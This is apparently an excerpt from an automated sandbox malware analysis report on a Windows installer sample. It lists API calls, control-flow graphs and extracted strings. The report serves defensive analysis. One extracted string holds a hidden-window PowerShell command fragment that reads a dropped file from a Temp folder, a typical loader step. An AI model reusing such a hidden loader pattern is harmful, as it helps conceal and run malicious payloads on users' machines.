            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
            • ShowWindow.USER32(?,00000008), ref: 00405569
            • GetDlgItem.USER32(?,000003EC), ref: 0040558A
            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
            • GetDlgItem.USER32(?,000003F8), ref: 00405498
              • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
            • GetDlgItem.USER32(?,000003EC), ref: 004055DC
            • CreateThread.KERNELBASE(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
            • CloseHandle.KERNELBASE(00000000), ref: 004055F1
            • ShowWindow.USER32(00000000), ref: 00405615
            • ShowWindow.USER32(?,00000008), ref: 0040561A
            • ShowWindow.USER32(00000008), ref: 00405664
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
            • CreatePopupMenu.USER32 ref: 004056A9
            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
            • GetWindowRect.USER32(?,?), ref: 004056DD
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
            • OpenClipboard.USER32(00000000), ref: 0040573E
            • EmptyClipboard.USER32 ref: 00405744
            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
            • GlobalLock.KERNEL32(00000000), ref: 0040575A
            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
            • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
            • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
            • CloseClipboard.USER32 ref: 0040579F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
            • String ID: (7B${
            • API String ID: 590372296-525222780
            • Opcode ID: bb73a53504d27f43939106f26146f08f97573c1b1641b77edd570ffa1ce9786c
            • Instruction ID: 916ab36d0f469a383f2c04aed4d67e33a9af93c646c7432e75c1414f8414c4dc
            • Opcode Fuzzy Hash: bb73a53504d27f43939106f26146f08f97573c1b1641b77edd570ffa1ce9786c
            • Instruction Fuzzy Hash: 44B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 430 4061a0-4061ab 431 4061ad-4061bc 430->431 432 4061be-4061d4 430->432 431->432 433 4061da-4061e7 432->433 434 4063ec-4063f2 432->434 433->434 435 4061ed-4061f4 433->435 436 4063f8-406403 434->436 437 4061f9-406206 434->437 435->434 439 406405-406409 call 40617e 436->439 440 40640e-40640f 436->440 437->436 438 40620c-406218 437->438 441 4063d9 438->441 442 40621e-40625a 438->442 439->440 444 4063e7-4063ea 441->444 445 4063db-4063e5 441->445 446 406260-40626b GetVersion 442->446 447 40637a-40637e 442->447 444->434 445->434 448 406285 446->448 449 40626d-406271 446->449 450 406380-406384 447->450 451 4063b3-4063b7 447->451 457 40628c-406293 448->457 449->448 454 406273-406277 449->454 455 406394-4063a1 call 40617e 450->455 456 406386-406392 call 4060c5 450->456 452 4063c6-4063d7 lstrlenW 451->452 453 4063b9-4063c1 call 4061a0 451->453 452->434 453->452 454->448 459 406279-40627d 454->459 468 4063a6-4063af 455->468 456->468 461 406295-406297 457->461 462 406298-40629a 457->462 459->448 464 40627f-406283 459->464 461->462 466 4062d6-4062d9 462->466 467 40629c-4062c2 call 40604b 462->467 464->457 469 4062e9-4062ec 466->469 470 4062db-4062e7 GetSystemDirectoryW 466->470 478 406361-406365 467->478 479 4062c8-4062d1 call 4061a0 467->479 468->452 472 4063b1 468->472 476 406357-406359 469->476 477 4062ee-4062fc GetWindowsDirectoryW 469->477 475 40635b-40635f 470->475 474 406372-406378 call 406412 472->474 474->452 475->474 475->478 476->475 480 4062fe-406308 476->480 477->476 478->474 483 406367-40636d lstrcatW 478->483 479->475 485 406322-406338 SHGetSpecialFolderLocation 480->485 486 40630a-40630d 480->486 483->474 489 406353 485->489 490 40633a-406351 SHGetPathFromIDListW CoTaskMemFree 485->490 486->485 488 40630f-406316 486->488 491 40631e-406320 488->491 489->476 490->475 490->489 491->475 491->485
            APIs
            • GetVersion.KERNEL32(00000000,afledes,?,00405314,afledes,00000000,00000000,00000000), ref: 00406263
            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E1
            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F4
            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
            • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 0040633E
            • CoTaskMemFree.OLE32(?), ref: 00406349
            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
            • lstrlenW.KERNEL32(: Completed,00000000,afledes,?,00405314,afledes,00000000,00000000,00000000), ref: 004063C7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$afledes$powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr
            • API String ID: 900638850-3020694706
            • Opcode ID: ad7f9d25d5d15659371a18125183daf3d831ef86bf1ddb5fded95f80f67ed536
            • Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
            • Opcode Fuzzy Hash: ad7f9d25d5d15659371a18125183daf3d831ef86bf1ddb5fded95f80f67ed536
            • Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 492 40596f-405995 call 405c3a 495 405997-4059a9 DeleteFileW 492->495 496 4059ae-4059b5 492->496 497 405b2b-405b2f 495->497 498 4059b7-4059b9 496->498 499 4059c8-4059d8 call 40617e 496->499 500 405ad9-405ade 498->500 501 4059bf-4059c2 498->501 505 4059e7-4059e8 call 405b7e 499->505 506 4059da-4059e5 lstrcatW 499->506 500->497 503 405ae0-405ae3 500->503 501->499 501->500 507 405ae5-405aeb 503->507 508 405aed-405af5 call 4064c1 503->508 509 4059ed-4059f1 505->509 506->509 507->497 508->497 516 405af7-405b0b call 405b32 call 405927 508->516 512 4059f3-4059fb 509->512 513 4059fd-405a03 lstrcatW 509->513 512->513 515 405a08-405a24 lstrlenW FindFirstFileW 512->515 513->515 517 405a2a-405a32 515->517 518 405ace-405ad2 515->518 532 405b23-405b26 call 4052dd 516->532 533 405b0d-405b10 516->533 521 405a52-405a66 call 40617e 517->521 522 405a34-405a3c 517->522 518->500 520 405ad4 518->520 520->500 534 405a68-405a70 521->534 535 405a7d-405a88 call 405927 521->535 524 405ab1-405ac1 FindNextFileW 522->524 525 405a3e-405a46 522->525 524->517 531 405ac7-405ac8 FindClose 524->531 525->521 528 405a48-405a50 525->528 528->521 528->524 531->518 532->497 533->507 538 405b12-405b21 call 4052dd call 40601f 533->538 534->524 539 405a72-405a7b call 40596f 534->539 545 405aa9-405aac call 4052dd 535->545 546 405a8a-405a8d 535->546 538->497 539->524 545->524 548 405aa1-405aa7 546->548 549 405a8f-405a9f call 4052dd call 40601f 546->549 548->524 549->524
            APIs
            • DeleteFileW.KERNEL32(?,?,75923420,75922EE0,00000000), ref: 00405998
            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,75923420,75922EE0,00000000), ref: 004059E0
            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,75923420,75922EE0,00000000), ref: 00405A03
            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,75923420,75922EE0,00000000), ref: 00405A09
            • FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,75923420,75922EE0,00000000), ref: 00405A19
            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
            • FindClose.KERNEL32(00000000), ref: 00405AC8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$0WB$\*.*
            • API String ID: 2035342205-930437106
            • Opcode ID: 61d094e0b938c2b562f272cde2d4fa0d9ebd931aa6c8141f9c7d85743630a1f2
            • Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
            • Opcode Fuzzy Hash: 61d094e0b938c2b562f272cde2d4fa0d9ebd931aa6c8141f9c7d85743630a1f2
            • Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 716 406846-40684b 717 4068bc-4068da 716->717 718 40684d-40687c 716->718 719 406eb2-406ec7 717->719 720 406883-406887 718->720 721 40687e-406881 718->721 725 406ee1-406ef7 719->725 726 406ec9-406edf 719->726 723 406889-40688d 720->723 724 40688f 720->724 722 406893-406896 721->722 727 4068b4-4068b7 722->727 728 406898-4068a1 722->728 723->722 724->722 729 406efa-406f01 725->729 726->729 732 406a89-406aa7 727->732 730 4068a3 728->730 731 4068a6-4068b2 728->731 733 406f03-406f07 729->733 734 406f28-406f34 729->734 730->731 737 40691c-40694a 731->737 735 406aa9-406abd 732->735 736 406abf-406ad1 732->736 738 4070b6-4070c0 733->738 739 406f0d-406f25 733->739 743 4066ca-4066d3 734->743 741 406ad4-406ade 735->741 736->741 744 406966-406980 737->744 745 40694c-406964 737->745 742 4070cc-4070df 738->742 739->734 748 406ae0 741->748 749 406a81-406a87 741->749 747 4070e4-4070e8 742->747 750 4070e1 743->750 751 4066d9 743->751 746 406983-40698d 744->746 745->746 753 406993 746->753 754 406904-40690a 746->754 770 406a66-406a7e 748->770 771 407068-407072 748->771 749->732 752 406a25-406a2f 749->752 750->747 756 4066e0-4066e4 751->756 757 406820-406841 751->757 758 406785-406789 751->758 759 4067f5-4067f9 751->759 766 407074-40707e 752->766 767 406a35-406bfe 752->767 776 407050-40705a 753->776 777 4068e9-406901 753->777 768 406910-406916 754->768 769 4069bd-4069c3 754->769 756->742 763 4066ea-4066f7 756->763 757->719 761 407035-40703f 758->761 762 40678f-4067a8 758->762 764 407044-40704e 759->764 765 4067ff-406813 759->765 761->742 772 4067ab-4067af 762->772 763->750 775 4066fd-406743 763->775 764->742 778 406816-40681e 765->778 766->742 767->743 768->737 773 406a21 768->773 769->773 774 4069c5-4069e3 769->774 770->749 771->742 772->758 780 4067b1-4067b7 772->780 773->752 781 4069e5-4069f9 774->781 782 4069fb-406a0d 774->782 783 406745-406749 775->783 784 40676b-40676d 775->784 776->742 777->754 778->757 778->759 785 4067e1-4067f3 780->785 786 4067b9-4067c0 780->786 787 406a10-406a1a 781->787 782->787 788 406754-406762 GlobalAlloc 783->788 789 40674b-40674e GlobalFree 783->789 790 40677b-406783 784->790 791 40676f-406779 784->791 785->778 792 4067c2-4067c5 GlobalFree 786->792 793 4067cb-4067db GlobalAlloc 786->793 787->769 794 406a1c 787->794 788->750 795 406768 788->795 789->788 790->772 791->790 791->791 792->793 793->750 793->785 797 4069a2-4069ba 794->797 798 40705c-407066 794->798 795->784 797->769 798->742
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
            • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
            • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
            • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
            APIs
            • FindFirstFileW.KERNELBASE(75923420,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,0040598F,?,75923420,75922EE0), ref: 004064CC
            • FindClose.KERNEL32(00000000), ref: 004064D8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID: xgB
            • API String ID: 2295610775-399326502
            • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
            • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
            • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
            • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
            APIs
            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
            Strings
            • C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable, xrefs: 00402154
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CreateInstance
            • String ID: C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable
            • API String ID: 542301482-4014694577
            • Opcode ID: 591e162b48f8759b5b2692d799258728b1136979a7dcee4b3aef57e1d8159fc5
            • Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
            • Opcode Fuzzy Hash: 591e162b48f8759b5b2692d799258728b1136979a7dcee4b3aef57e1d8159fc5
            • Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 182 403d6a-403d7c 183 403d82-403d88 182->183 184 403ebd-403ecc 182->184 183->184 185 403d8e-403d97 183->185 186 403f1b-403f30 184->186 187 403ece-403f16 GetDlgItem * 2 call 404242 SetClassLongW call 40140b 184->187 188 403d99-403da6 SetWindowPos 185->188 189 403dac-403daf 185->189 191 403f70-403f75 call 40428e 186->191 192 403f32-403f35 186->192 187->186 188->189 194 403db1-403dc3 ShowWindow 189->194 195 403dc9-403dcf 189->195 200 403f7a-403f95 191->200 197 403f37-403f42 call 401389 192->197 198 403f68-403f6a 192->198 194->195 201 403dd1-403de6 DestroyWindow 195->201 202 403deb-403dee 195->202 197->198 219 403f44-403f63 SendMessageW 197->219 198->191 199 40420f 198->199 207 404211-404218 199->207 205 403f97-403f99 call 40140b 200->205 206 403f9e-403fa4 200->206 208 4041ec-4041f2 201->208 210 403df0-403dfc SetWindowLongW 202->210 211 403e01-403e07 202->211 205->206 215 403faa-403fb5 206->215 216 4041cd-4041e6 DestroyWindow KiUserCallbackDispatcher 206->216 208->199 213 4041f4-4041fa 208->213 210->207 217 403eaa-403eb8 call 4042a9 211->217 218 403e0d-403e1e GetDlgItem 211->218 213->199 221 4041fc-404205 ShowWindow 213->221 215->216 222 403fbb-404008 call 4061a0 call 404242 * 3 GetDlgItem 215->222 216->208 217->207 223 403e20-403e37 SendMessageW IsWindowEnabled 218->223 224 403e3d-403e40 218->224 219->207 221->199 252 404012-40404e ShowWindow KiUserCallbackDispatcher call 404264 EnableWindow 222->252 253 40400a-40400f 222->253 223->199 223->224 227 403e42-403e43 224->227 228 403e45-403e48 224->228 232 403e73-403e78 call 40421b 227->232 229 403e56-403e5b 228->229 230 403e4a-403e50 228->230 233 403e91-403ea4 SendMessageW 229->233 235 403e5d-403e63 229->235 230->233 234 403e52-403e54 230->234 232->217 233->217 234->232 238 403e65-403e6b call 40140b 235->238 239 403e7a-403e83 call 40140b 235->239 248 403e71 238->248 239->217 249 403e85-403e8f 239->249 248->232 249->248 256 404050-404051 252->256 257 404053 252->257 253->252 258 404055-404083 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 404085-404096 SendMessageW 258->259 260 404098 258->260 261 40409e-4040dc call 404277 call 40617e lstrlenW call 4061a0 SetWindowTextW call 401389 259->261 260->261 261->200 270 4040e2-4040e4 261->270 270->200 271 4040ea-4040ee 270->271 272 4040f0-4040f6 271->272 273 40410d-404121 DestroyWindow 271->273 272->199 274 4040fc-404102 272->274 273->208 275 404127-404154 CreateDialogParamW 273->275 274->200 276 404108 274->276 275->208 277 40415a-4041b1 call 404242 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->199 277->199 282 4041b3-4041c6 ShowWindow call 40428e 277->282 284 4041cb 282->284 284->208
            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
            • ShowWindow.USER32(?), ref: 00403DC3
            • DestroyWindow.USER32 ref: 00403DD7
            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
            • GetDlgItem.USER32(?,?), ref: 00403E14
            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
            • IsWindowEnabled.USER32(00000000), ref: 00403E2F
            • GetDlgItem.USER32(?,00000001), ref: 00403EDD
            • GetDlgItem.USER32(?,00000002), ref: 00403EE7
            • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F52
            • GetDlgItem.USER32(?,00000003), ref: 00403FF8
            • ShowWindow.USER32(00000000,?), ref: 00404019
            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
            • EnableWindow.USER32(?,?), ref: 00404046
            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040405C
            • EnableMenuItem.USER32(00000000), ref: 00404063
            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040407B
            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
            • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
            • SetWindowTextW.USER32(?,00423728), ref: 004040CB
            • ShowWindow.USER32(?,0000000A), ref: 004041FF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
            • String ID: (7B
            • API String ID: 3282139019-3251261122
            • Opcode ID: f1306570f035e21c4f068449413519e45d51919a909de34d05465df8e21c2881
            • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
            • Opcode Fuzzy Hash: f1306570f035e21c4f068449413519e45d51919a909de34d05465df8e21c2881
            • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D

            Control-flow Graph

            • Executed
            • Not Executed
